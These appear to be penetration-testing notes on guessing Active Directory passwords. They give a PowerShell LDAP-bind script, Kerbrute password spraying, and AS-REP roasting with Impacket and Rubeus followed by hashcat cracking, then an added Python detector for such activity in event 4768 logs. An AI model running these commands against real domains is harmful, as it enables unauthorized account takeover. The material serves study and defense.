Password Guessing

Basic Powershell Script

This method is a low-and-slow password guessing attempt using a PowerShell script that relies on LDAP and ADSI. In the following PowerShell script we call the DirectoryEntry constructor with a candidate username and password. This creates a directory entry in the context of that user; if the bind succeeds, the object is created and we can conclude that the password is correct.

# Locate the primary domain controller of the current domain
$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObject.PdcRoleOwner).Name
# Build the LDAP path to the domain root, e.g. LDAP://dc01.p42.com/DC=p42,DC=com
$SearchURL = "LDAP://"
$SearchURL += $PDC + "/"
$UniqueName = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$SearchURL += $UniqueName
# Bind as the candidate user; a successful bind means the password is correct
New-Object System.DirectoryServices.DirectoryEntry($SearchURL, "username", "password!")

Crackmapexec

The CrackMapExec tool can be used to authenticate to the SMB service with a username and password.

Using Crackmapexec

Obtaining a TGT

In this method we attempt to get a TGT from the Domain Controller using a username and password. Kerbrute is one of the tools that can be used for password guessing in this way. The syntax of the command is as follows:

.\kerbrute_windows_amd64.exe passwordspray -d p42.com .\usernames.txt "password!"

AS-Rep Roasting

As part of obtaining a TGT, the username and password have to be presented to the domain controller; this is called preauthentication. Sometimes preauthentication is disabled for an account, and then any user can send an AS-REQ on that account's behalf and receive an AS-REP. Once obtained, the AS-REP can be used to guess the password offline.

Using Impacket

Impacket can be used to perform this attack with the following command:

impacket-GetNPUsers -dc-ip 192.168.1.2 -request -outputfile hash.asreproast p42.com/username

This fetches the AS-REP hash, which can be cracked with hashcat (mode 18200) using the following command:

sudo hashcat -m 18200 hash.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Using Rubeus

Rubeus is a Windows tool that can be used to perform the same attack. It identifies which users in the domain are vulnerable to this attack and then performs it against them. The output of the tool displays each user's hash, which can then be used to guess the password with hashcat as above.

.\Rubeus.exe asreproast /nowrap

In a given domain the users that do not require preauthentication can be identified by using PowerView.ps1's function "Get-DomainUser" with the option "-PreauthNotRequired".
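Added example (not part of the original notes): a Python check that a defender can run over Windows Security event 4768 (TGT requested) records to spot the AS-REQ pattern this section describes. Roasting an account that does not require preauthentication shows up as a 4768 with Pre-Authentication Type 0, usually combined with an RC4-HMAC (0x17) ticket request; the flattened field names and the sample records below are constructed for this example, not taken from real logs.

```python
"""Flag AS-REQ activity consistent with AS-REP roasting (event 4768).

An AS-REQ for an account with pre-authentication disabled is logged with
Pre-Authentication Type 0, and roasting tools normally request an RC4-HMAC
(0x17) ticket so the returned hash is cheap to crack offline. Flagging that
combination, grouped by source IP, is the detection.
"""
from collections import defaultdict

PREAUTH_NONE = 0        # 4768 "Pre-Authentication Type" 0 = no pre-auth
ETYPE_RC4_HMAC = 0x17   # 4768 "Ticket Encryption Type" 0x17 = RC4-HMAC

def parse_4768(line):
    """Parse one constructed, flattened 'key=value; key=value' record."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def is_asrep_roast_candidate(event):
    """True when a 4768 shows no pre-auth and an RC4 ticket request."""
    return (event.get("EventID") == "4768"
            and int(event["PreAuthType"]) == PREAUTH_NONE
            and int(event["TicketEncryptionType"], 16) == ETYPE_RC4_HMAC)

def find_asrep_roast_activity(lines):
    """Map each client IP to the sorted accounts it roasted, if any."""
    hits = defaultdict(set)
    for line in lines:
        event = parse_4768(line)
        if is_asrep_roast_candidate(event):
            hits[event["IpAddress"]].add(event["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}

# Constructed sample records (not real logs). PreAuthType 2 = PA-ENC-TIMESTAMP,
# i.e. normal pre-authentication; 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_EVENTS = [
    "EventID=4768; TargetUserName=alice; PreAuthType=2; TicketEncryptionType=0x12; IpAddress=10.0.0.5",
    "EventID=4768; TargetUserName=svc_backup; PreAuthType=0; TicketEncryptionType=0x17; IpAddress=10.0.0.99",
    "EventID=4768; TargetUserName=svc_legacy; PreAuthType=0; TicketEncryptionType=0x17; IpAddress=10.0.0.99",
    "EventID=4768; TargetUserName=bob; PreAuthType=2; TicketEncryptionType=0x17; IpAddress=10.0.0.99",
    "EventID=4769; TargetUserName=carol; PreAuthType=0; TicketEncryptionType=0x17; IpAddress=10.0.0.7",
]

if __name__ == "__main__":
    for ip, users in find_asrep_roast_activity(SAMPLE_EVENTS).items():
        print(f"{ip}: no-preauth RC4 AS-REQs for {', '.join(users)}")
```

One client touching several no-preauth accounts in a short window is the strongest signal; a single hit on a service account with preauthentication deliberately disabled may be normal and is better handled by re-enabling preauthentication on that account.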
